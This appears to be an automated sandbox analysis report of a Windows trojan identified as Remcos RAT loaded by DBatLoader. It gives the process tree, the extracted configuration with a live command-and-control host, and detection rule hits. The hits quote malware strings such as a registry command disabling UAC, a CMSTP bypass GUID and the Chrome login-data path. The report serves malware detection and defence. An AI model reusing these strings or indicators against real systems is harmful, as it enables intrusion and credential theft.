
Windows Analysis Report
udVh4Ist4Z.exe

Overview

General Information

Sample name: udVh4Ist4Z.exe (renamed because original name is a hash value)
Original sample name: 2cc30d206669699e58870623365fef82.exe
Analysis ID: 1430910
MD5: 2cc30d206669699e58870623365fef82
SHA1: de5e70f094d0b72660aa57b87667edd9d52971fc
SHA256: 42ac8e7e9df9877af1382f5626fd74e63210d307f6d577cd5b387ffd0c9520bd
Tags: 32, exe, trojan

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Delayed program exit found
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file name differs from the original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • udVh4Ist4Z.exe (PID: 2056 cmdline: "C:\Users\user\Desktop\udVh4Ist4Z.exe" MD5: 2CC30D206669699E58870623365FEF82)
    • cmd.exe (PID: 4972 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\XjfxsfmnO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 3516 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\udVh4Ist4Z.exe C:\\Users\\Public\\Libraries\\Xjfxsfmn.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • nmfsxfjX.pif (PID: 5000 cmdline: C:\Users\Public\Libraries\nmfsxfjX.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • remcos.exe (PID: 3492 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • Xjfxsfmn.PIF (PID: 4040 cmdline: "C:\Users\Public\Libraries\Xjfxsfmn.PIF" MD5: 2CC30D206669699E58870623365FEF82)
    • nmfsxfjX.pif (PID: 6400 cmdline: C:\Users\Public\Libraries\nmfsxfjX.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • remcos.exe (PID: 2616 cmdline: "C:\Users\user\AppData\Roaming\Remcos\remcos.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • remcos.exe (PID: 7008 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • remcos.exe (PID: 3380 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • Xjfxsfmn.PIF (PID: 3708 cmdline: "C:\Users\Public\Libraries\Xjfxsfmn.PIF" MD5: 2CC30D206669699E58870623365FEF82)
    • nmfsxfjX.pif (PID: 2420 cmdline: C:\Users\Public\Libraries\nmfsxfjX.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • remcos.exe (PID: 5068 cmdline: "C:\Users\user\AppData\Roaming\Remcos\remcos.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • remcos.exe (PID: 5756 cmdline: "C:\Users\user\AppData\Roaming\Remcos\remcos.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Version": "4.9.4 Pro", "Host:Port:Password": "kenoss.duckdns.org:1166:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-L24XL1", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\Public\Libraries\XjfxsfmnO.bat | Rule: MALWARE_BAT_KoadicBAT | Description: Koadic post-exploitation framework BAT payload | Author: ditekSHen | Strings:
  • 0x2:$s1: &@cls&@set
  • 0x5b:$s2: :~41,1%%
  • 0x67:$s2: :~47,1%%
  • 0x73:$s2: :~6,1%%
  • 0x7e:$s2: :~53,1%%
  • 0x8a:$s2: :~1,1%
  • 0x9b:$s2: :~10,1%%
  • 0xa7:$s2: :~39,1%%
  • 0xb3:$s2: :~16,1%%
  • 0xbf:$s2: :~13,1%%
  • 0xcb:$s2: :~25,1%%
  • 0xd7:$s2: :~53,1%%
  • 0xe3:$s2: :~42,1%%
  • 0xef:$s2: :~22,1%%
  • 0xfb:$s2: :~18,1%%
  • 0x107:$s2: :~48,1%%
  • 0x113:$s2: :~51,1%%
  • 0x11f:$s2: :~2,1%%
  • 0x12a:$s2: :~61,1%%
  • 0x136:$s2: :~9,1%%
  • 0x141:$s2: :~19,1%%
Source: 0000000F.00000002.2561591986.0000000002E21000.00000020.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_DBatLoader | Description: Yara detected DBatLoader | Author: Joe Security
Source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown | Strings:
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
Source: 00000008.00000002.2296612772.0000000002D91000.00000020.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_DBatLoader | Description: Yara detected DBatLoader | Author: Joe Security
(50 further memory entries not shown)

Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown | Strings:
  • 0x6c4a8:$a1: Remcos restarted by watchdog!
  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown | Strings:
  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6656c:$str_b2: Executing file:
  • 0x675ec:$str_b3: GetDirectListeningPort
  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67118:$str_b7: \update.vbs
  • 0x66594:$str_b9: Downloaded file:
  • 0x66580:$str_b10: Downloading file:
  • 0x66624:$str_b12: Failed to upload file:
  • 0x675b4:$str_b13: StartForward
  • 0x675d4:$str_b14: StopForward
  • 0x67070:$str_b15: fso.DeleteFile "
  • 0x67004:$str_b16: On Error Resume Next
  • 0x670a0:$str_b17: fso.DeleteFolder "
  • 0x66614:$str_b18: Uploaded file:
  • 0x665d4:$str_b19: Unable to delete:
  • 0x67038:$str_b20: while fso.FileExists("
  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen | Strings:
  • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6637c:$s1: CoGetObject
  • 0x66390:$s1: CoGetObject
  • 0x663ac:$s1: CoGetObject
  • 0x70338:$s1: CoGetObject
  • 0x6633c:$s2: Elevation:Administrator!new:
(30 further unpacked PE entries not shown)

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Libraries\nmfsxfjX.pif, CommandLine: C:\Users\Public\Libraries\nmfsxfjX.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\nmfsxfjX.pif, NewProcessName: C:\Users\Public\Libraries\nmfsxfjX.pif, OriginalFileName: C:\Users\Public\Libraries\nmfsxfjX.pif, ParentCommandLine: "C:\Users\user\Desktop\udVh4Ist4Z.exe", ParentImage: C:\Users\user\Desktop\udVh4Ist4Z.exe, ParentProcessId: 2056, ParentProcessName: udVh4Ist4Z.exe, ProcessCommandLine: C:\Users\Public\Libraries\nmfsxfjX.pif, ProcessId: 5000, ProcessName: nmfsxfjX.pif
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Xjfxsfmn.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\udVh4Ist4Z.exe, ProcessId: 2056, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xjfxsfmn
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 13.107.137.11, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\Xjfxsfmn.PIF, Initiated: true, ProcessId: 4040, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49715
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Xjfxsfmn.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\udVh4Ist4Z.exe, ProcessId: 2056, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xjfxsfmn
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\nmfsxfjX.pif, CommandLine: C:\Users\Public\Libraries\nmfsxfjX.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\nmfsxfjX.pif, NewProcessName: C:\Users\Public\Libraries\nmfsxfjX.pif, OriginalFileName: C:\Users\Public\Libraries\nmfsxfjX.pif, ParentCommandLine: "C:\Users\user\Desktop\udVh4Ist4Z.exe", ParentImage: C:\Users\user\Desktop\udVh4Ist4Z.exe, ParentProcessId: 2056, ParentProcessName: udVh4Ist4Z.exe, ProcessCommandLine: C:\Users\Public\Libraries\nmfsxfjX.pif, ProcessId: 5000, ProcessName: nmfsxfjX.pif
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\nmfsxfjX.pif, ProcessId: 5000, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-L24XL1
No Snort rule has matched


AV Detection

Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp/C | URL Reputation: Label: phishing
Source: C:\Users\Public\Libraries\netutils.dll | Avira: detection malicious, Label: TR/AVI.Agent.rqsyc
Source: 16.1.nmfsxfjX.pif.400000.1.unpack | Malware Configuration Extractor: Remcos {"Version": "4.9.4 Pro", "Host:Port:Password": "kenoss.duckdns.org:1166:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-L24XL1", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | ReversingLabs: Detection: 63%
Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Virustotal: Detection: 66%
Source: C:\Users\Public\Libraries\netutils.dll | ReversingLabs: Detection: 82%
Source: C:\Users\Public\Libraries\netutils.dll | Virustotal: Detection: 67%
Source: udVh4Ist4Z.exe | ReversingLabs: Detection: 63%
Source: udVh4Ist4Z.exe | Virustotal: Detection: 66%
Source: Yara match | File source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: nmfsxfjX.pif PID: 5000, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTR
Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Joe Sandbox ML: detected
Source: udVh4Ist4Z.exe | Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,6_1_00433837
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 10_1_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,10_1_00433837
Source: udVh4Ist4Z.exe, 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_8754e71a-3

Exploits

Source: Yara match | File source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: nmfsxfjX.pif PID: 5000, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_004074FD _wcslen,CoGetObject,6_1_004074FD
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 10_1_004074FD _wcslen,CoGetObject,10_1_004074FD
Source: udVh4Ist4Z.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb | source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb | source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
Source: Binary string: easinvoker.pdbH | source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134401693.0000000014E81000.00000004.00000020.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Code function: 0_2_02D658CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02D658CC
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_1_00409253
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,6_1_0041C291
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,6_1_0040C34D
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_1_00409665
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_0044E879 FindFirstFileExA,6_1_0044E879
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,6_1_0040880C
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_0040783C FindFirstFileW,FindNextFileW,6_1_0040783C
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,6_1_00419AF5
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_1_0040BB30
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_1_0040BD37
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 7_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,7_2_0040128D
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 7_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,7_2_00401612
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 10_1_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_1_00409253
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 10_1_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_1_0041C291
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 10_1_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_1_0040C34D
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 10_1_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_1_00409665
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 10_1_0044E879 FindFirstFileExA,10_1_0044E879
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 10_1_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_1_0040880C
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 10_1_0040783C FindFirstFileW,FindNextFileW,10_1_0040783C
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 10_1_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,10_1_00419AF5
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 10_1_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_1_0040BB30
Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 10_1_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_1_0040BD37
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 12_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,12_2_0040128D
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 12_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,12_2_00401612
